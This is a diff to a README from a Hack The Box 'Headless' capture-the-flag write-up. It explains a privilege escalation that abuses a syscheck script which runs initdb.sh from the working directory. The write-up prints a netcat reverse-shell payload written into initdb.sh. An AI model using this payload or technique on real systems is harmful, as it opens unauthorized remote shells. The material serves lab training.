3v401/HackTheBox/Headless/README.md

 `/usr/bin/syscheck` is a system checking script that performs several actions, among them checking if a process named `ìnitdb.sh` is running; if not, it attempts to start it.

-Since `syscheck` runs `initdb.sh` script, an attacker can exploit this by placing a malicious `initdb.sh` script in the directory from which the `syscheck`is executed.
-The plan is to insert a reverse shell ayload into the `initdb.sh` script.
-For that run:
+Since `syscheck` runs `initdb.sh` script, an attacker might think about exploiting this by placing a malicious `initdb.sh` script in the directory from which the `syscheck`is executed.
+The plan is to insert a reverse shell payload into the `initdb.sh` script.
+For that run in the CL:

 ```
 echo "nc -e /bin/sh {IP} {port}" > initdb.sh
 chmod +x initdb.sh
 ```

-Being {IP} and {port} your IP and port (my port in this case will be 1212).
-Echo prints the payload that will be executed by the webserver to return a reverse shell to us.
+Being {IP} and {port} your IP and port (my port in this case will be 1212). `echo` prints the payload that will be executed by the webserver to return a reverse shell to us.
 Second line is to make the file executable.

 The execution flow is the following: